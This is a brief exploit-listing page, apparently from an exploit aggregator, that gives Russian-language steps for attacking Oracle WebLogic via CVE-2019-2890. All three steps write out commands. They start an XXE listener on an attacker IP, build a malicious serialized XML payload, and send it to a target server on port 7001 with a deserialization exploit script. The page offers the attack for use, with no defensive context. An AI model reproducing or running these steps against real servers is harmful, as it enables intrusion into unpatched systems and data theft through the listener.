Sploitus

Exploit for weblogic_cve-2019-2890

kitploit · 2026-08-25

Exploit Code

MARKDOWN6 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-FREEIDE-WEBLOGIC_CVE-2019-2890
1)Запустить инструмент XXER python xxer.py -H 192.168.17.223

2)Поместить poc xxer в файл xx.xml, заменить сериализованные данные, внедрить poc xxer; java -jar weblogic_xxe.jar xx.xml

3)Использовать weblogic.py из инструмента java-deserialization-exploit для отправки данных на сервер weblogic python weblogic.py 192.168.17.222 7001 weblogic